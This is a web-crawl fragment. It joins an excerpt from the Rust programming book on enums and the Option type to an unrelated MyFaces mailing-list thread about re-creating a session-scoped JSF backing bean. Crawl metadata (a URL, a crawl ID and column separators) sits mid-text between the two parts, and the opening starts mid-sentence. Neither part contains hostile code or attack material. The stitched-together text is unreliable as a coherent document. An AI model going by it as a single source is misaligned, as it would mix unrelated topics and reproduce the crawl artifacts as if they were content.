we’ve defined and used, but it embeds the address data inside the variants in
the form of two different structs, which are defined differently for each
variant:
struct Ipv4Addr {
    // --snip--
}

struct Ipv6Addr {
    // --snip--
}

enum IpAddr {
    V4(Ipv4Addr),
    V6(Ipv6Addr),
}
This code illustrates that you can put any kind of data inside an enum variant: strings, numeric types, or structs, for example. You can even include another enum! Also, standard library types are often not much more complicated than what you might come up with.
Note that even though the standard library contains a definition for
IpAddr,
we can still create and use our own definition without conflict because we
haven’t brought the standard library’s definition into our scope. We’ll talk
more about bringing types into scope in Chapter 7.
Let’s look at another example of an enum in Listing 6-2: this one has a wide variety of types embedded in its variants:
enum Message {
    Quit,
    Move { x: i32, y: i32 },
    Write(String),
    ChangeColor(i32, i32, i32),
}
Listing 6-2: A
Message enum whose variants each store
different amounts and types of values
This enum has four variants with different types:
Quit has no data associated with it at all.
Move includes an anonymous struct inside it.
Write includes a single String.
ChangeColor includes three i32 values.
Defining an enum with variants like the ones in Listing 6-2 is similar to defining different kinds of struct definitions, except the enum doesn’t use the `struct` keyword and all the variants are grouped together under the `Message` type. The following structs could hold the same data that the preceding enum variants hold:
```rust
struct QuitMessage; // unit struct
struct MoveMessage {
    x: i32,
    y: i32,
}
struct WriteMessage(String); // tuple struct
struct ChangeColorMessage(i32, i32, i32); // tuple struct
```
But if we used the different structs, which each have their own type, we couldn’t as easily define a function to take any of these kinds of messages as we could with the `Message` enum defined in Listing 6-2, which is a single type.
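To make that point concrete, here is a small sketch that is not from the book: one function signature accepts every kind of message, which would not be possible if each message were its own struct type. The trimmed-down enum, the `process` name, and the `match` expression (covered in the next section) are illustrative only:

```rust
// A trimmed-down Message enum for illustration.
enum Message {
    Quit,
    Write(String),
}

// One function handles every variant, because Message is a single type.
fn process(msg: Message) -> &'static str {
    match msg {
        Message::Quit => "handled a Quit",
        Message::Write(_) => "handled a Write",
    }
}

fn main() {
    println!("{}", process(Message::Quit));
    println!("{}", process(Message::Write(String::from("hello"))));
}
```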
There is one more similarity between enums and structs: just as we’re able to define methods on structs using `impl`, we’re also able to define methods on enums. Here’s a method named `call` that we could define on our `Message` enum:
```rust
impl Message {
    fn call(&self) {
        // method body would be defined here
    }
}

let m = Message::Write(String::from("hello"));
m.call();
```
The body of the method would use `self` to get the value that we called the method on. In this example, we’ve created a variable `m` that has the value `Message::Write(String::from("hello"))`, and that is what `self` will be in the body of the `call` method when `m.call()` runs.
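As a sketch of what such a body might actually do — the book leaves it empty — `call` could match on `self` to behave differently per variant. The trimmed-down enum and the specific return strings below are illustrative assumptions, not the book’s code:

```rust
// A trimmed-down Message enum for illustration.
enum Message {
    Quit,
    Write(String),
}

impl Message {
    // One possible body for call: inspect self and act per variant.
    fn call(&self) -> String {
        match self {
            Message::Quit => String::from("quit requested"),
            Message::Write(text) => format!("writing: {}", text),
        }
    }
}

fn main() {
    let m = Message::Write(String::from("hello"));
    println!("{}", m.call());
}
```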
Let’s look at another enum in the standard library that is very common and useful: `Option`.
The `Option` Enum and Its Advantages Over Null Values
In the previous section, we looked at how the `IpAddr` enum let us use Rust’s type system to encode more information than just the data into our program. This section explores a case study of `Option`, which is another enum.
Programming language design is often thought of in terms of which features you include, but the features you exclude are important too. Rust doesn’t have the null feature that many other languages have. Null is a value that means there is no value there. In languages with null, variables can always be in one of two states: null or not-null.
In his 2009 presentation “Null References: The Billion Dollar Mistake,” Tony Hoare, the inventor of null, calls its invention his billion-dollar mistake.
The problem with null values is that if you try to use a null value as a not-null value, you’ll get an error of some kind. Because this null or not-null property is pervasive, it’s extremely easy to make this kind of error.
However, the concept that null is trying to express is still a useful one: a null is a value that is currently invalid or absent for some reason.
The problem isn’t really with the concept but with the particular implementation. As such, Rust does not have nulls, but it does have an enum that can encode the concept of a value being present or absent. This enum is `Option<T>`, and it is defined by the standard library as follows:
```rust
enum Option<T> {
    Some(T),
    None,
}
```
The `Option<T>` enum is so useful that it’s even included in the prelude; you don’t need to bring it into scope explicitly. In addition, so are its variants: you can use `Some` and `None` directly without the `Option::` prefix. The `Option<T>` enum is still just a regular enum, and `Some(T)` and `None` are still variants of type `Option<T>`.
The `<T>` syntax is a feature of Rust we haven’t talked about yet. It’s a generic type parameter, and we’ll cover generics in more detail in Chapter 10. For now, all you need to know is that `<T>` means the `Some` variant of the `Option` enum can hold one piece of data of any type. Here are some examples of using `Option` values to hold number types and string types:
```rust
let some_number = Some(5);
let some_string = Some("a string");

let absent_number: Option<i32> = None;
```
If we use `None` rather than `Some`, we need to tell Rust what type of `Option<T>` we have, because the compiler can’t infer the type that the `Some` variant will hold by looking only at a `None` value.

When we have a `Some` value, we know that a value is present and the value is held within the `Some`. When we have a `None` value, in some sense, it means the same thing as null: we don’t have a valid value. So why is having `Option<T>` any better than having null?
In short, because `Option<T>` and `T` (where `T` can be any type) are different types, the compiler won’t let us use an `Option<T>` value as if it were definitely a valid value. For example, this code won’t compile because it’s trying to add an `i8` to an `Option<i8>`:
```rust
let x: i8 = 5;
let y: Option<i8> = Some(5);

let sum = x + y;
```
If we run this code, we get an error message like this:
```
error[E0277]: the trait bound `i8: std::ops::Add<std::option::Option<i8>>` is not satisfied
 -->
  |
5 |     let sum = x + y;
  |               ^ no implementation for `i8 + std::option::Option<i8>`
  |
```
Intense! In effect, this error message means that Rust doesn’t understand how to add an `i8` and an `Option<i8>`, because they’re different types. When we have a value of a type like `i8` in Rust, the compiler will ensure that we always have a valid value. We can proceed confidently without having to check for null before using that value. Only when we have an `Option<i8>` (or whatever type of value we’re working with) do we have to worry about possibly not having a value, and the compiler will make sure we handle that case before using the value.
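One way to make the failing addition compile is to convert the `Option<i8>` into an `i8` first, for example with the standard `unwrap_or` method, which supplies a default for the `None` case. The `add_maybe` helper below is an illustrative sketch, not from the book:

```rust
// Convert the Option<i8> into an i8 before adding; unwrap_or supplies a
// default value to use when the Option is None.
fn add_maybe(x: i8, y: Option<i8>) -> i8 {
    x + y.unwrap_or(0)
}

fn main() {
    let x: i8 = 5;
    let y: Option<i8> = Some(5);
    println!("{}", add_maybe(x, y)); // 10
    println!("{}", add_maybe(x, None)); // 5
}
```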
In other words, you have to convert an `Option<T>` to a `T` before you can perform `T` operations with it. Generally, this helps catch one of the most common issues with null: assuming that something isn’t null when it actually is.
Not having to worry about incorrectly assuming a not-null value helps you to be more confident in your code. In order to have a value that can possibly be null, you must explicitly opt in by making the type of that value `Option<T>`. Then, when you use that value, you are required to explicitly handle the case when the value is null. Everywhere that a value has a type that isn’t an `Option<T>`, you can safely assume that the value isn’t null. This was a deliberate design decision for Rust to limit null’s pervasiveness and increase the safety of Rust code.
So, how do you get the `T` value out of a `Some` variant when you have a value of type `Option<T>` so you can use that value? The `Option<T>` enum has a large number of methods that are useful in a variety of situations; you can check them out in its documentation. Becoming familiar with the methods on `Option<T>` will be extremely useful in your journey with Rust.
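A few of those standard methods can be sketched with values like the ones earlier in the chapter. `is_some`, `is_none`, `map`, and `unwrap_or` are real `Option` methods; the specific combinations below are just illustrative:

```rust
fn main() {
    let some_number: Option<i32> = Some(5);
    let absent_number: Option<i32> = None;

    // is_some and is_none report which variant is present.
    assert!(some_number.is_some());
    assert!(absent_number.is_none());

    // map applies a closure only to the Some case, leaving None untouched.
    assert_eq!(some_number.map(|n| n * 2), Some(10));
    assert_eq!(absent_number.map(|n| n * 2), None);

    // unwrap_or extracts the inner value, with a fallback for None.
    assert_eq!(some_number.unwrap_or(0), 5);
    assert_eq!(absent_number.unwrap_or(0), 0);

    println!("all Option method checks passed");
}
```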
In general, in order to use an `Option<T>` value, you want to have code that will handle each variant. You want some code that will run only when you have a `Some(T)` value, and this code is allowed to use the inner `T`. You want some other code to run if you have a `None` value, and that code doesn’t have a `T` value available. The `match` expression is a control flow construct that does just this when used with enums: it will run different code depending on which variant of the enum it has, and that code can use the data inside the matching value.
value. | https://doc.rust-lang.org/book/ch06-01-defining-an-enum.html | CC-MAIN-2018-51 | en | refinedweb |
Thanks Andrew. As you correctly suggested, I already have code in the backing bean to clear the backing bean properties. But the problem is that when I navigate back and forth from the current page to other pages and come back to the current page, I want the backing bean associated with the current page to be re-created, i.e. a new instance of the backing bean.
Of course I also want to clear the data on the form fields.
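(The idea under discussion — remove the bean's key from the session map so the framework re-creates it on the next lookup — can be sketched outside JSF with a plain `Map` standing in for `getSessionMap()`. In a real application the map would come from `FacesContext.getCurrentInstance().getExternalContext()`; the `SessionSketch` class and method names below are hypothetical.)

```java
import java.util.HashMap;
import java.util.Map;

public class SessionSketch {
    static class MyBean {
        String field = "";
    }

    // Stand-in for the JSF session map.
    static Map<String, Object> sessionMap = new HashMap<>();

    // Managed-bean style lookup: create the bean on first access.
    static MyBean lookup() {
        return (MyBean) sessionMap.computeIfAbsent("myBean", k -> new MyBean());
    }

    // Removing the key forces a fresh instance on the next lookup.
    static void navigateAway() {
        sessionMap.remove("myBean");
    }

    public static void main(String[] args) {
        MyBean first = lookup();
        first.field = "stale data";
        navigateAway();
        MyBean second = lookup();
        System.out.println(first == second);        // false: a new instance
        System.out.println(second.field.isEmpty()); // true: fields reset
    }
}
```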
Andrew Robinson-5 wrote:
>
> I didn't mean to clear the form, but clear the backing bean properties.
>
> public class MyBean {
> private MyObject myObject;
>
> public String save() {
> // EntityManager or hibernate session save here
> // clear the properties:
> clearState();
> }
>
> public void onCancel(ActionEvent evt) {
> clearState();
> }
>
> private void clearState() {
> myObject = null;
> }
> }
>
> On 6/13/07, bansi <mail2bansi@yahoo.com> wrote:
>>
>> I figured out that i can do something like this ...
>> In session scope, only one instance of the backing bean will be used
>> during
>> the whole browser session. When you want to recreate the managed bean
>> inside
>> the backing bean during session, then do
>> FacesContext
>> .getCurrentInstance()
>> .getExternalContext()
>> .getSessionMap()
>> .put("myBean", new MyBean());
>>
>> BUT i am not sure where to put this snippet of code.
>>
>>
>>
>> bansi wrote:
>> >
>> > Andrew
>> > I totally agree with you on "its the desired behavior of a session bean
>> --
>> > one instance for the
>> > user's session"
>> > But is their a way to recreate the instance of backing bean in
>> following
>> > situations
>> > 1) Whenever a new record is inserted into database. The reason i
>> mention
>> > this is my backing bean instantiates the pojo and for subsequent save
>> into
>> > database the backing bean holds onto the old instance of pojo having
>> same
>> > identifier (ID) value. This is exactly the reason Hibernate throws
>> > Detached Object Exception passed to Persist
>> >
>> > 2) Whenever i navigate between JSF pages , i wanna backing bean to be
>> > re-initialized i.e. re-created with new instance
>> >
>> > Please note as suggested by you i am not looking to clear off the
>> fields
>> > on the form whereas i want to recreate the whole backing bean itself
>> >
>> > Any pointers/suggestions highly appreciated
>> >
>> > Regards
>> > Bansi
>> >
>> >
>> > Andrew Robinson-5 wrote:
>> >>
>> >> That is the desired behavior of a session bean -- one instance for the
>> >> user's session. If you want to use session, and have it be able to be
>> >> cleared, then you will want to create a clear action or action
>> >> listener method that clears all of the member variables when executed.
>> >>
>> >> I would instead recommend using conversational scope from JBoss-Seam
>> >> or MyFaces or request scope and use saveState as needed to persist
>> >> values across pages.
>> >>
>> >> -Andrew
>> >>
>> >> On 6/13/07, bansi <mail2bansi@yahoo.com> wrote:
>> >>>
>> >>> We have backing bean defined in "session" scope
>> >>> So whenever we do a submit on JSF Form, it holds onto same backing
>> bean.
>> >>> This is not desirable as
>> >>> -> The Form will have different set of values each time it does
a
>> >>> submit
>> >>> -> The Backing bean has variable defined to instantiate a POJO
>> >>> i.e.private
>> >>> MyPojo pojo = new MyPojo();
>> >>> So every time JSF form submits to the backing bean, it holds onto the
>> >>> same
>> >>> instance of POJO which eventually results in insertion problems into
>> >>> database i.e. having same Identifier (ID) value
>> >>> -> The same problem occurs if i navigate to different page and come
>> back
>> >>> to
>> >>> original page
>> >>>
>> >>> Is their a way to re-initialize the Backing Bean ???
>> >>> --
>> >>> View this message in context:
>> >>>
>>
>> >>> Sent from the MyFaces - Users mailing list archive at Nabble.com.
>> >>>
>> >>>
>> >>
>> >>
>> >
>> >
>>
>> --
>> View this message in context:
>>
>> Sent from the MyFaces - Users mailing list archive at Nabble.com.
>>
>>
>
>
--
View this message in context:
Sent from the MyFaces - Users mailing list archive at Nabble.com. | http://mail-archives.apache.org/mod_mbox/myfaces-users/200706.mbox/%3C11113434.post@talk.nabble.com%3E | CC-MAIN-2018-51 | en | refinedweb |